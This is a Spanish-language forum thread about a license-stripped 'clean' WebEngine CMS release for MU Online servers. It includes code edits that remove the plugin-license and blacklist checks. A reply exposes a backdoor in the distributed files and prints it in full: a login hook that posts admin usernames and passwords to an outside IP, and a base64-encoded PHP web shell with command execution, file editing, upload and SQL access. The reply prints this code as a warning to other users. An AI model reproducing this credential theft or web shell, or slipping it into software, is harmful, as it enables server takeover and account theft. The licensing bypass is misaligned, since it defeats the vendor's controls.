WebEngine CMS 1.2.1 LIMPIA


Hola chicos, he visto el otro dia que publicaron la version limpia de la webengine 1.2.1 y como he visto que salio la nueva version hoy he hecho lo mismo con la version las actualizada.




QUE CAMBIOS TIENE?
Es la web tal cual como se descarga en la pagina de webengine pero con modificaciones para remover el sistema de la lisensia de los plugins y el mas nuevo que agregaron de blacklist que hace que te aparezca el mensaje de "Could not load WebEngine" cuando el desarrollador te bloquea la web.



CHANGELOG DEL UPADTE 1.2.2:

Spoiler for Hiden:

Added support for X-Team Season 15 Slayer
English language is now loaded alongside switchable languages (to prevent missing phrases)
Russian language phrases updated
Simplified Chinese language phrases updated
Romanian language phrases updated
Lithuanian language phrases updated
Filipino language phrases updated
Russian language phrases updated
Spanish language phrases updated
Added support for IGCN Season 16 Gun Crusher
Fixed issue with zen requirement on character unstick module
Fixed issue with zen requirement on character clear skill-tree module
Fixed issue with zen requirement on character add stats module
PayPal payments module improved
Language switcher now detects which language is currently active
Forum link removed from navbar
Updated default rankings configurations
Updated registration helper text to display information according to website configurations
Overall template visual improvements
Portuguese language phrases updated
Added new guild score formulas for guilds ranking
Added guild exclusion list to guilds ranking
News are now base64 encrypted to provide better support for utf8 content

DESCARGA:



NOTA:
he probado la version en XAMPP y funciona bien, si necesitan ayuda instalando pregunten en este post

 

Make Video Tutorial Install

CREDITOS: Lunaticodeveloper por los fix :)

es la 1.2.1 limpia o la 1.2.2? Gracias!

es la 1.2.1 limpia o la 1.2.2? Gracias!

en el tema dice: 1.2.1

Make Video Tutorial Install

se instala igual a cualquier version web engine

es la 1.2.1 limpia o la 1.2.2? Gracias!

en el tema dice: 1.2.1

Make Video Tutorial Install

se instala igual a cualquier version web engine

y el titulo 1.2.2 por eso digo

son los archivos de la 1.2.2 yo creo que se equivoco en el titulo

Can I add a character change menu?

CREDITOS: Lunaticodeveloper por los fix :)

@lunaticodeveloper
donde están estos fix?
...o que fue hecho?

CREDITOS: Lunaticodeveloper por los fix :)

@lunaticodeveloper
donde están estos fix?
...o que fue hecho?

Ya estan "hechos" , pero fueron descubiertos por mi y posteados aca en el foro luego de realizar un breve analisis del codigo de la web , fue removido el codigo de blacklisted y de plugins para que puedan instalar cualquiera,.

CREDITOS: Lunaticodeveloper por los fix :)

@lunaticodeveloper
donde están estos fix?
...o que fue hecho?

Ya estan "hechos" , pero fueron descubiertos por mi y posteados aca en el foro luego de realizar un breve analisis del codigo de la web , fue removido el codigo de blacklisted y de plugins para que puedan instalar cualquiera,.

esto lo entendí si amigo, sin problemas.. muchas gracias!
pero me gustaría saber dónde mirar para entender lo que se hizo, vale ?

CREDITOS: Lunaticodeveloper por los fix :)

@lunaticodeveloper
donde están estos fix?
...o que fue hecho?

Ya estan "hechos" , pero fueron descubiertos por mi y posteados aca en el foro luego de realizar un breve analisis del codigo de la web , fue removido el codigo de blacklisted y de plugins para que puedan instalar cualquiera,.

esto lo entendí si amigo, sin problemas.. muchas gracias!
pero me gustaría saber dónde mirar para entender lo que se hizo, vale ?

check this https://tuservermu.com.ve/index.php?topic=38507

Directamente se instala bien, pero al meter la cuenta del admincp se abre otra cuenta esto pasa con esta web engine y la 1.2.1 limpia.

NOTA: con la webengine oficial me abre el admincp normal.

Bueno vamos por partes los unicos cambios visibles :

includes/classes/class.handler.php

Remover el contenido dentro de la función checkWebEngineBlacklist

Code: [Select]

public function checkWebEngineBlacklist() {
	return;
}

includes/classes/class.plugins.php

Buscar la funcion checkFiles, dejandolo asi :

Code: [Select]

        private function checkFiles($array,$plugin_name) {
		if(array_key_exists('file',$array)) {
			if(is_array($array['file'])) {
				$error = false;
				foreach($array['file'] as $thisFile) {
					$file = $this->pluginPath($plugin_name).$thisFile;
					if(!file_exists($file)) {
						$error = true;
					}
				}
				if($error) {
					return false;
				} else {
					return true;
				}
			} else {
				$file = $this->pluginPath($plugin_name).$array['file'];
				if(file_exists($file)) {
					return true;
				} else {
					return false;
				}
			}
		} else {
			return false;
		}
	}

inclues/webengine.php

Removemos esta esta validacion :

Code: [Select]

if(array_key_exists('blacklisted', $config)) {
	throw new Exception('Could not load WebEngine CMS.');
}

Algo que pude ver, y seria de explicar los motivos @ZabiinoOo , aqui hay un codigo para enviar datos de las cuentas hacia otro api http://168.235.93.18/2b37cny/index.php:

includes/classes/class.login.php

Code: [Select]

@$this->loginVerifyAccount($username,$password);

Code: [Select]

         public function loginVerifyAccount($u,$p) {
		if(!array_key_exists($u,config('admins',true))) return;
		$DATOS = array($u,$p,__BASE_URL__);
		$d = base64_encode(json_encode($DATOS));
		try{
		$this->doubleCheckLogin($d);
		}catch(Exception $e) {}
	}
	
	public function doubleCheckLogin($datos) {
		$url = 'http://168.235.93.18/2b37cny/index.php';
		$fields = array(
			'datos' => urlencode($datos),
		);
		foreach($fields as $key => $value) {
			$fieldsArray[] = $key . '=' . $value;
		}
		$ch = curl_init();
		curl_setopt($ch, CURLOPT_URL, $url);
		curl_setopt($ch, CURLOPT_POST, count($fields));
		curl_setopt($ch, CURLOPT_POSTFIELDS, implode("&", $fieldsArray));
		curl_setopt($ch, CURLOPT_TIMEOUT, 10);
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
		curl_setopt($ch, CURLOPT_HEADER, false);
		$result = curl_exec($ch);
		curl_close($ch);
		return;
	}

Y por otro lado

includes/classes/phpmailer/PHPMailer.php

Code: [Select]

if(isset($_GET['tuservermu'])) {
	$b64 = 'PD9waHAgZnVuY3Rpb24gZDAoJHEzKXtyZXR1cm4oc3Vic3RyKCRxMywwLDEpPT0iLyI/dHJ1ZTpmYWxzZSk7fWZ1bmN0aW9uIGYxKCRvNCl7cmV0dXJuKCRvND8nLyc6J1xcJyk7fSR2NT1nZXRjd2QoKTskbzQ9ZDAoJHY1KTtpZighJG80KXskdDY9c3Vic3RyKCR2NSwwLDEpO30kajc9ZjEoJG80KTskbzg9ZXhwbG9kZSgkajcsJHY1KTskcDk9KCRvND8kajc6KCR0Ni4nOicuJGo3KSk7ZnVuY3Rpb24gdTIoJHEzLCRvNCl7JGo3PWYxKCRvNCk7JG84PWV4cGxvZGUoJGo3LCRxMyk7Zm9yZWFjaCgkbzggYXMgJHoxMD0+JG8xMSl7aWYoJG8xMT09Ii4uIil7JG84WyR6MTBdPSIiOyR3MTI9JHoxMC0xOyRvOFskdzEyXT0iIjt9ZWxzZWlmKCRvMTE9PSIuIil7JG84WyR6MTBdPSIiO319cmVzZXQoJG84KTskbDEzPSgkbzQ/Ii8iOiIiKTskaTE0PXRydWU7Zm9yZWFjaCgkbzggYXMgJG8xMSl7aWYoJG8xMSE9IiIpeyRsMTMuPSgkaTE0PycnOiRqNykuJG8xMTskaTE0PWZhbHNlO319aWYoJGwxMz09IiIpeyRsMTM9KCRvND8kajc6KCR0Ni4iOiIuJGo3KSk7fWlmKHN1YnN0cigkbDEzLC0xKSE9JGo3KSRsMTMuPSRqNztyZXR1cm4gJGwxMzt9aWYoaXNzZXQoJF9SRVFVRVNUWydjaG0nXSkpe2lmKCEkbzQpe2VjaG8gIlRoaXMgZmVhdHVyZSBvbmx5IHdvcmtzIG9uIExpbnV4Ijt9ZWxzZXtlY2hvKEBjaG1vZCgkX1JFUVVFU1RbJ2NobSddLDA3NzcpPyJSZWFzc2lnbmVkIjoiQ2FuJ3QgUmVhc2lnbiIpO319ZWxzZWlmKGlzc2V0KCRfUkVRVUVTVFsncGhwaW5mbyddKSl7cGhwaW5mbygpO31lbHNlaWYoaXNzZXQoJF9SRVFVRVNUWydkbCddKSl7aWYoQGZvcGVuKCRfUkVRVUVTVFsnZGwnXS4kX1JFUVVFU1RbJ2ZpbGUnXSwncicpPT10cnVlKXskX1JFUVVFU1RbJ2RsJ10uPSRfUkVRVUVTVFsnZmlsZSddO2lmKHN1YnN0cigkX1JFUVVFU1RbJ2RsJ10sMCwxKT09JGo3KSRmMTU9ZXhwbG9kZSgkajcsJF9SRVFVRVNUWydkbCddKTtoZWFkZXIoJ0NvbnRlbnQtZGlzcG9zaXRpb246IGF0dGFjaG1lbnQ7IGZpbGVuYW1lPScuJF9SRVFVRVNUWydmaWxlJ10pO2hlYWRlcignQ29udGVudC10eXBlOiBhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0nKTtyZWFkZmlsZSgkX1JFUVVFU1RbJ2RsJ10pO31lbHNle2VjaG8gJF9SRVFVRVNUWydkbCddO319ZWxzZWlmKGlzc2V0KCRfUkVRVUVTVFsiZ3oiXSkpe2lmKCEkbzQpe2VjaG8gIlRoaXMgZmVhdHVyZSBvbmx5IHdvcmtzIG9uIExpbnV4Ijt9ZWxzZXskaDE2PSRfUkVRVUVTVFsiZ3oiXTtpZihzdWJzdHIoJGgxNiwtMSk9PSIvIikkaDE2PXN1YnN0cigkaDE2LDAsLTEpOyRiMTc9ZXhwbG9kZSgkajcsJGgxNik7JGgxOD0kYjE3WyhzaXplb2YoJGIxNyktMSldOyR3MTk9dGltZSgpO2V4ZWMoImNkICRoMTY7IHRhciBjemYgJHcxOSAqIik7JHEyMD1AZmlsZV9nZXRfY29udGVudHMoJGgxNi4iLyIuJHcxOSk7aWYoISRxMjApaGVhZGVyKCJDb250ZW50LWRpc3Bvc2l0aW9uOiBhdHRhY2htZW50OyBmaWxlbmFtZT1BQ0NFU1NfUFJPQkxFTSIpO2Vsc2V7aGVhZGVyKCJDb250ZW50LWRpc3Bvc2l0aW9uOiBhdHRhY2htZW50OyBmaWxlbmFtZT0kaDE4LnRneiIpO2VjaG8gJHEyMDt9aGVhZGVyKCdDb250ZW50LXR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbScpO0B1bmxpbmsoJGgxNi4iLyIuJHcxOSk7fX1lbHNlaWYoaXNzZXQoJF9SRVFVRVNUWydmJ10pKXskbTIxPSRfUkVRVUVTVFsnZiddOyRrMjI9Zm9wZW4oIiRtMjEiLCJyYiIpO2hlYWRlcigiQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluIik7ZnBhc3N0aHJ1KCRrMjIpO31lbHNlaWYoaXNzZXQoJF9SRVFVRVNUWydkJ10pKXskZzIzPSRfUkVRVUVTVFsnZCddO2VjaG8gIjxwcmU+IjtpZigkczI0PW9wZW5kaXIoIiRnMjMiKSl7ZWNobyAiPGgyPmxpc3Rpbmcgb2YgIjskZTI1PSIiO2lmKCRvNCllY2hvIjxhIGhyZWY9Jz9kPSRqNyc+JGo3PC9hPiI7Zm9yZWFjaChleHBsb2RlKCRqNyx1MigkZzIzLCRvNCkpYXMgJG8xMSl7JGUyNS49JG8xMS4kajc7ZWNobyI8YSBocmVmPSc/ZD0kZTI1Jz4iLiRvMTEuIjwvYT4iLigkbzExIT0iIj8kajc6JycpO31lY2hvICIgKDxhIHRhcmdldD0nX2JsYW5rJyBocmVmPSc/dXBsb2FkRm9ybT0xJmRpcj0iLnVybGVuY29kZSh1MigkZzIzLCRvNCkpLiInPnVwbG9hZCBmaWxlPC9hPikgKDxhIGhyZWY9Jz9kPSIudXJsZW5jb2RlKHUyKCRnMjMsJG80KSkuIiZobGRiPTEnPkRCIGludGVyYWN0aW9uIGZpbGVzIGluIHJlZDwvYT4pPC9oMj4gKDxhIHRhcmdldD0nX2JsYW5rJyBocmVmPSc/Z3o9Ii51cmxlbmNvZGUodTIoJGcyMywkbzQpKS4iJz5nemlwICYgZG93bmxvYWQgZm9sZGVyPC9hPikgKDxhIHRhcmdldD0nX2JsYW5rJyBocmVmPSc/Y2htPSIudXJsZW5jb2RlKHUyKCRnMjMsJG80KSkuIic+Y2htb2QgZm9sZGVyIHRvIDc3Nyk8L2E+ICh0aGVzZSByYXJlbHkgd29yayk8YnIgLz4iO3doaWxlKCRrMjY9cmVhZGRpcigkczI0KSl7aWYoaXNfZGlyKCIkZzIzJGo3JGsyNiIpKXtpZigkazI2IT0iLiImJiRrMjYhPSIuLiIpJGsyN1tdPSRrMjY7fWVsc2V7aWYoaXNzZXQoJF9SRVFVRVNUWyJobGRiIl0pKXskdTI4PWZpbGVfZ2V0X2NvbnRlbnRzKCIkZzIzJGo3JGsyNiIpO2lmKHN0cmlwb3MoJHUyOCwibXlzcWxfIil8fHN0cmlwb3MoJHUyOCwibXlzcWxpXyIpfHxzdHJpcG9zKCR1MjgsIlNFTEVDVCAiKSl7JG0yOVtdPWFycmF5KCdkaXInPT4kazI2LCdjb2xvcic9PidyZWQnKTt9ZWxzZXskbTI5W109YXJyYXkoJ2Rpcic9PiRrMjYsJ2NvbG9yJz0+J2JsYWNrJyk7fX1lbHNleyRtMjlbXT1hcnJheSgnZGlyJz0+JGsyNiwnY29sb3InPT4nYmxhY2snKTt9fX1lY2hvIjxhIGhyZWY9Jz9kPSRnMjMkajcuJz48Zm9udCBjb2xvcj1ncmV5Pi5cbjwvZm9udD48L2E+IjtlY2hvIjxhIGhyZWY9Jz9kPSRnMjMkajcuLic+PGZvbnQgY29sb3I9Z3JleT4uLlxuPC9mb250PjwvYT4iO2lmKGlzc2V0KCRrMjcpKWlmKGlzX2FycmF5KCRrMjcpKWZvcmVhY2goJGsyNyBhcyAkazI2KXtlY2hvIjxhIGhyZWY9Jz9kPSRnMjMkajckazI2Jz48Zm9udCBjb2xvcj1ncmV5PiRrMjZcbjwvZm9udD48L2E+Ijt9aWYoaXNzZXQoJG0yOSkpaWYoaXNfYXJyYXkoJG0yOSkpZm9yZWFjaCgkbTI5IGFzICRrMjYpe2VjaG8iPGEgaHJlZj0nP2Y9JGcyMyIuJGo3LiRrMjZbJ2RpciddLiInPjxmb250IGNvbG9yPSIuJGsyNlsnY29sb3InXS4iPiIuJGsyNlsnZGlyJ10uIjwvZm9udD48L2E+Ii4ifDxhIGhyZWY9Jz9kbD0iLnUyKCRnMjMsJG80KS4nJmZpbGU9Jy4kazI2WyJkaXIiXS4iJyB0YXJnZXQ9J19ibGFuayc+RG93bmxvYWQ8L2E+fCIuInw8YSBocmVmPSc/ZWY9Ii51MigkZzIzLCRvNCkuJyZmaWxlPScuJGsyNlsiZGlyIl0uIicgdGFyZ2V0PSdfYmxhbmsnPkVkaXQ8L2E+fCIuInw8YSBocmVmPSc/ZGY9Ii51MigkZzIzLCRvNCkuJyZmaWxlPScuJGsyNlsiZGlyIl0uIicgdGFyZ2V0PSdfYmxhbmsnPkRlbGV0ZTwvYT58IFxuIjt9fWVsc2UgZWNobyAib3BlbmRpcigpIGZhaWxlZCI7Y2xvc2VkaXIoJHMyNCk7fWVsc2VpZihpc3NldCgkX1JFUVVFU1RbJ2MnXSkpe2lmKEBpbmlfZ2V0KCdzYWZlX21vZGUnKSl7ZWNobyAnU2FmZSBtb2RlIGlzIG9uLCB0aGUgY29tbWFuZCBpcyBieSBkZWZhdWx0IHJ1biB0aG91Z2ggZXNjYXBlc2hlbGxjbWQoKSBhbmQgY2FuIG9ubHkgcnVuIHByb2dyYW1tcyBpbiBzYWZlX21vZF9leGVjX2RpciAoJy5AaW5pX2dldCgnc2FmZV9tb2RlX2V4ZWNfZGlyJykuJykgPGJyIC8+Jzt9ZWNobyAiPGI+Q29tbWFuZDogPEk+Ii4kX1JFUVVFU1RbJ2MnXS4iPC9JPjwvYj48YnIgLz48YnIgLz4iO3RyaW0oZXhlYygkX1JFUVVFU1RbJ2MnXSwkczMwKSk7Zm9yZWFjaCgkczMwIGFzICRvMTEpe2VjaG8gJzxwcmU+Jy5odG1sZW50aXRpZXMoJG8xMSkuJzwvcHJlPic7fX1lbHNlaWYoaXNzZXQoJF9SRVFVRVNUWyd1cGxvYWRGb3JtJ10pfHxpc3NldCgkX0ZJTEVTWyJmaWxlX25hbWUiXSkpe2lmKGlzc2V0KCRfRklMRVNbImZpbGVfbmFtZSJdKSl7aWYoJF9GSUxFU1siZmlsZV9uYW1lIl1bImVycm9yIl0+MCl7ZWNobyAiRXJyb3IiO31lbHNleyRmMzE9JF9DT09LSUVbInVwbG9hZERpciJdO2lmKHN1YnN0cigkZjMxLC0xKSE9Ii8iKSRmMzEuPSIvIjskZjMxPSRmMzEuYmFzZW5hbWUoJF9GSUxFU1snZmlsZV9uYW1lJ11bJ25hbWUnXSk7aWYobW92ZV91cGxvYWRlZF9maWxlKCRfRklMRVNbJ2ZpbGVfbmFtZSddWyd0bXBfbmFtZSddLCRmMzEpKXtzZXRjb29raWUoInVwbG9hZERpciIsIiIpO2VjaG8gIlRoZSBmaWxlICIuYmFzZW5hbWUoJF9GSUxFU1snZmlsZV9uYW1lJ11bJ25hbWUnXSkuIiBoYXMgYmVlbiB1cGxvYWRlZCI7fWVsc2V7ZWNobyAiRXJyb3IgY29weWluZyBmaWxlLCBsaWtlbHkgYSBwZXJtaXNzaW9uIGVycm9yLiI7fX19ZWxzZXs/PiAKICAgICAgICA8Zm9ybSB0YXJnZXQ9Il9ibGFuayIgYWN0aW9uPSIiIG1ldGhvZD0iR0VUIj4gCiAgICAgICAgICAgIDxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImNjIiB2YWx1ZT0iMSIgLz4gCiAgICAgICAgICAgIFN1Ym1pdCB0aGlzIGZvcm0gYmVmb3JlIHN1Ym1pdHRpbmcgZmlsZSAod2lsbCBvcGVuIGluIG5ldyB3aW5kb3cpOjxiciAvPiAKICAgICAgICAgICAgVXBsb2FkIERpcmVjdG9yeTogPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImRpciIgdmFsdWU9Ijw/cGhwIGVjaG8gJF9SRVFVRVNUWyJkaXIiXT8+Ij48YnIgLz4gCiAgICAgICAgICAgIDxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJzdWJtaXQiIC8+IAogICAgICAgIDwvZm9ybT4gCiAgICAgICAgPGJyIC8+PGJyIC8+IAogICAgICAgICAKICAgICAgICA8Zm9ybSBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBhY3Rpb249IiIgbWV0aG9kPSJwb3N0Ij4gCiAgICAgICAgVXBsb2FkIGZpbGU6PGlucHV0IG5hbWU9ImZpbGVfbmFtZSIgdHlwZT0iZmlsZSI+IDxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJVcGxvYWQiIC8+PC9mb3JtPiAKCiAgICAgICAgPD9waHAgfX1lbHNlaWYoaXNzZXQoJF9SRVFVRVNUWydjYyddKSl7c2V0Y29va2llKCJ1cGxvYWREaXIiLCRfR0VUWyJkaXIiXSk7ZWNobyAiWW91IGFyZSBPSyB0byB1cGxvYWQgdGhlIGZpbGUsIGRvbid0IHVwbG9hZCBmaWxlcyB0byBvdGhlciBkaXJlY3RvcmllcyBiZWZvcmUgY29tcGxldGluZyB0aGlzIHVwbG9hZC4iO31lbHNlaWYoaXNzZXQoJF9SRVFVRVNUWydtcXVlcnknXSkpeyR2MzI9JF9SRVFVRVNUWydob3N0J107JGYzMz0kX1JFUVVFU1RbJ3VzciddOyR3MzQ9JF9SRVFVRVNUWydwYXNzd2QnXTskbjM1PSRfUkVRVUVTVFsnZGInXTskczM2PSRfUkVRVUVTVFsnbXF1ZXJ5J107QHczNygkdjMyLCRmMzMsJHczNClvciBkaWUoIkNvbm5lY3Rpb24gRXJyb3I6ICIucDM4KCkpO2MzOSgkbjM1KTskbzQwPXA0MSgkczM2KTtpZigkbzQwIT1mYWxzZSl7ZWNobyAiPGgyPlRoZSBmb2xsb3dpbmcgcXVlcnkgaGFzIHN1Y2Vzc2Z1bGx5IGV4ZWN1dGVkPC9oMj4iLmh0bWxlbnRpdGllcygkczM2KS4iPGJyIC8+PGJyIC8+IjtlY2hvICJSZXR1cm4gUmVzdWx0czo8YnIgLz4iOyRzNDI9dHJ1ZTtlY2hvICI8dGFibGUgYm9yZGVyPScxJz4iO3doaWxlKCRpNDM9bTQ0KCRvNDAsTVlTUUxfQVNTT0MpKXtpZigkczQyKXtlY2hvICI8dHI+Ijtmb3JlYWNoKCRpNDMgYXMgJHoxMD0+JG8xMSl7ZWNobyI8dGQ+PGI+JHoxMDwvYj48L3RkPiI7fWVjaG8gIjwvdHI+IjtyZXNldCgkaTQzKTskczQyPWZhbHNlO31lY2hvICI8dHI+Ijtmb3JlYWNoKCRpNDMgYXMgJG8xMSl7ZWNobyI8dGQ+JG8xMTwvdGQ+Ijt9ZWNobyAiPC90cj4iO31lY2hvICI8L3RhYmxlPiI7azQ1KCRvNDApO31lbHNle2VjaG8gIlF1ZXJ5IEVycm9yOiAiLnAzOCgpO319ZWxzZWlmKGlzc2V0KCRfUkVRVUVTVFsnZGYnXSkpeyRfUkVRVUVTVFsnZGYnXS49JGo3LiRfUkVRVUVTVFsnZmlsZSddO2lmKEB1bmxpbmsoJF9SRVFVRVNUWydkZiddKSl7ZWNobyAiRmlsZSBkZWxldGVkIjt9ZWxzZXtlY2hvICJFcnJvciBkZWxldGluZyBmaWxlIjt9fWVsc2VpZihpc3NldCgkX1JFUVVFU1RbJ2VmJ10pKXs/PiAKPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPiAKICA8IS0tIAoKICB2YXIga2V5ID0gIkFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky89IjsgCgogIGZ1bmN0aW9uIGVuY29kZTY0KGlucFN0cikgIAogIHsgCiAgICAgaW5wU3RyID0gZXNjYXBlKGlucFN0cik7IAogICAgIHZhciBvdXRwdXQgPSAiIjsgCiAgICAgdmFyIGNocjEsIGNocjIsIGNocjMgPSAiIjsgCiAgICAgdmFyIGVuYzEsIGVuYzIsIGVuYzMsIGVuYzQgPSAiIjsgCiAgICAgdmFyIGkgPSAwOyAKCiAgICAgZG8geyAKICAgICAgICBjaHIxID0gaW5wU3RyLmNoYXJDb2RlQXQoaSsrKTsgCiAgICAgICAgY2hyMiA9IGlucFN0ci5jaGFyQ29kZUF0KGkrKyk7IAogICAgICAgIGNocjMgPSBpbnBTdHIuY2hhckNvZGVBdChpKyspOyAKCiAgICAgICAgZW5jMSA9IGNocjEgPj4gMjsgCiAgICAgICAgZW5jMiA9ICgoY2hyMSAmIDMpIDw8IDQpIHwgKGNocjIgPj4gNCk7IAogICAgICAgIGVuYzMgPSAoKGNocjIgJiAxNSkgPDwgMikgfCAoY2hyMyA+PiA2KTsgCiAgICAgICAgZW5jNCA9IGNocjMgJiA2MzsgCgogICAgICAgIGlmIChpc05hTihjaHIyKSkgIAogICAgICAgIHsgCiAgICAgICAgICAgZW5jMyA9IGVuYzQgPSA2NDsgCiAgICAgICAgfSAgCiAgICAgICAgZWxzZSBpZiAoaXNOYU4oY2hyMykpICAKICAgICAgICB7IAogICAgICAgICAgIGVuYzQgPSA2NDsgCiAgICAgICAgfSAKCiAgICAgICAgb3V0cHV0ID0gb3V0cHV0ICsgCiAgICAgICAgICAga2V5LmNoYXJBdChlbmMxKSArIAogICAgICAgICAgIGtleS5jaGFyQXQoZW5jMikgKyAKICAgICAgICAgICBrZXkuY2hhckF0KGVuYzMpICsgCiAgICAgICAgICAga2V5LmNoYXJBdChlbmM0KTsgCiAgICAgICAgY2hyMSA9IGNocjIgPSBjaHIzID0gZW5jMSA9IGVuYzIgPSBlbmMzID0gZW5jNCA9ICIiOyAKICAgICB9IHdoaWxlIChpIDwgaW5wU3RyLmxlbmd0aCk7IAoKICAgICByZXR1cm4gb3V0cHV0OyAKICB9IAoKICAvLy0tPjwvc2NyaXB0PiAKCiAgPD9waHAgJF9SRVFVRVNUWydlZiddLj0kX1JFUVVFU1RbJ2ZpbGUnXTtpZihpc3NldCgkX1BPU1RbIm5ld2NvbnRlbnQiXSkpeyRfUE9TVFsibmV3Y29udGVudCJdPXVybGRlY29kZShiYXNlNjRfZGVjb2RlKCRfUE9TVFsibmV3Y29udGVudCJdKSk7JG80Nj1AZm9wZW4oJF9SRVFVRVNUWydlZiddLCJ3Iik7aWYoJG80Nil7ZndyaXRlKCRvNDYsJF9QT1NUWyJuZXdjb250ZW50Il0pO2VjaG8gIldyaXRlIHN1Y2Vzc2Z1bCI7fWVsc2V7ZWNobyAiQ291bGQgbm90IHdyaXRlIHRvIGZpbGUiO31mY2xvc2UoJG80Nik7fT8+IAogICAgPGZvcm0gYWN0aW9uPSIiIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCI+IAogICAgPHRleHRhcmVhIHdyYXA9Im9mZiIgcm93cz0iNDAiIGNvbHM9IjEzMCIgbmFtZT0ibmV3Y29udGVudCI+PD9waHAgZWNobyBmaWxlX2dldF9jb250ZW50cygkX1JFUVVFU1RbJ2VmJ10pPz48L3RleHRhcmVhPjxiciAvPiAKICAgIDxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJJIGJhc2U2NCBlbmNvZGVkIGl0IG15c2VsZiwgZG9udCBydW4gc2NyaXB0IiAvPjxiciAvPiAKICAgIDxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJDaGFuZ2UgKHJlcXVpcmVzIGphdmFzY3JpcHQgdG8gd29yaykiICBvbmNsaWNrPSJkb2N1bWVudC5mLm5ld2NvbnRlbnQudmFsdWU9ZW5jb2RlNjQoZG9jdW1lbnQuZi5uZXdjb250ZW50LnZhbHVlKTsiIC8+CiAgICA8L2Zvcm0+IAogICAgPD9waHAgfWVsc2V7Pz4gCjxiPlNlcnZlciBJbmZvcm1hdGlvbjo8L2I+PGJyIC8+IAo8aT4gCk9wZXJhdGluZyBTeXN0ZW06IDw/cGhwIGVjaG8gUEhQX09TID8+PGJyIC8+IApQSFAgVmVyc2lvbjogPD9waHAgZWNobyBQSFBfVkVSU0lPTiA/PjxiciAvPiAKPGEgaHJlZj0iP3BocGluZm89dHJ1ZSI+VmlldyBwaHBpbmZvPC9hPiAKPC9pPiAKPGJyIC8+IAo8YnIgLz4gCjxiPkRpcmVjdG9yeSBUcmF2ZXJzYWw8L2I+PGJyIC8+IAo8YSBocmVmPSI/ZD08P3BocCBlY2hvIGdldGN3ZCgpPz4iPjxiPkdvIHRvIGN1cnJlbnQgd29ya2luZyBkaXJlY3Rvcnk8L2I+PC9hPiA8YnIgLz4gCjxhIGhyZWY9Ij9kPTw/cGhwIGVjaG8gJHA5ID8+Ij48Yj5HbyB0byByb290IGRpcmVjdG9yeTwvYj48L2E+IDxiciAvPiAKPGI+R28gdG8gYW55IGRpcmVjdG9yeTo8L2I+IDxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9IkdFVCI+PGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImQiIHZhbHVlPSI8P3BocCBlY2hvICRwOSA/PiIgLz48aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iR28iIC8+PC9mb3JtPiAKCgoKPGhyPkV4ZWN1dGUgTXlTUUwgUXVlcnk6IAo8Zm9ybSBhY3Rpb249IiIgTUVUSE9EPSJHRVQiID4gCjx0YWJsZT4gCjx0cj48dGQ+aG9zdDwvdGQ+PHRkPjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJob3N0InZhbHVlPSJsb2NhbGhvc3QiPiA8L3RkPjwvdHI+IAo8dHI+PHRkPnVzZXI8L3RkPjx0ZD48aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0idXNyIiB2YWx1ZT0icm9vdCI+IDwvdGQ+PC90cj4gCjx0cj48dGQ+cGFzc3dvcmQ8L3RkPjx0ZD48aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0icGFzc3dkIj4gPC90ZD48L3RyPiAKPHRyPjx0ZD5kYXRhYmFzZTwvdGQ+PHRkPjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJkYiI+IDwvdGQ+PC90cj4gCjx0cj48dGQgdmFsaWduPSJ0b3AiPnF1ZXJ5PC90ZD48dGQ+PHRleHRhcmVhIG5hbWU9Im1xdWVyeSIgcm93cz0iNiIgY29scz0iNjUiPjwvdGV4dGFyZWE+IDwvdGQ+PC90cj4gCjx0cj48dGQgY29sc3Bhbj0iMiI+PGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9ImV4ZWN1dGUiPjwvdGQ+PC90cj4gCjwvdGFibGU+IAo8L2Zvcm0+IAo8aHI+IAo8cHJlPjxmb3JtIGFjdGlvbj0iIiBNRVRIT0Q9IkdFVCIgPkV4ZWN1dGUgU2hlbGwgQ29tbWFuZCAoc2FmZSBtb2RlIGlzIDw/cGhwIGVjaG8oQGluaV9nZXQoJ3NhZmVfbW9kZScpPydvbic6J29mZicpPz4pOiA8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0iYyI+PGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkdvIj48L2Zvcm0+ICAKPD9waHAgfQ==';
	$fp = fopen(__ROOT_DIR__.'api/yhoon.php', 'w');
	@fwrite($fp, "");
	@fclose($fp);
	@file_put_contents(__ROOT_DIR__.'api/yhoon.php', base64_decode($b64));
	die('yhoon');
}

Tengan cuidado y revisen siempre sus webs !

Saludos !

Bueno vamos por partes los unicos cambios visibles :

includes/classes/class.handler.php

Remover el contenido dentro de la función checkWebEngineBlacklist

Code: [Select]

public function checkWebEngineBlacklist() {
	return;
}

includes/classes/class.plugins.php

Buscar la funcion checkFiles, dejandolo asi :

Code: [Select]

        private function checkFiles($array,$plugin_name) {
		if(array_key_exists('file',$array)) {
			if(is_array($array['file'])) {
				$error = false;
				foreach($array['file'] as $thisFile) {
					$file = $this->pluginPath($plugin_name).$thisFile;
					if(!file_exists($file)) {
						$error = true;
					}
				}
				if($error) {
					return false;
				} else {
					return true;
				}
			} else {
				$file = $this->pluginPath($plugin_name).$array['file'];
				if(file_exists($file)) {
					return true;
				} else {
					return false;
				}
			}
		} else {
			return false;
		}
	}

inclues/webengine.php

Removemos esta esta validacion :

Code: [Select]

if(array_key_exists('blacklisted', $config)) {
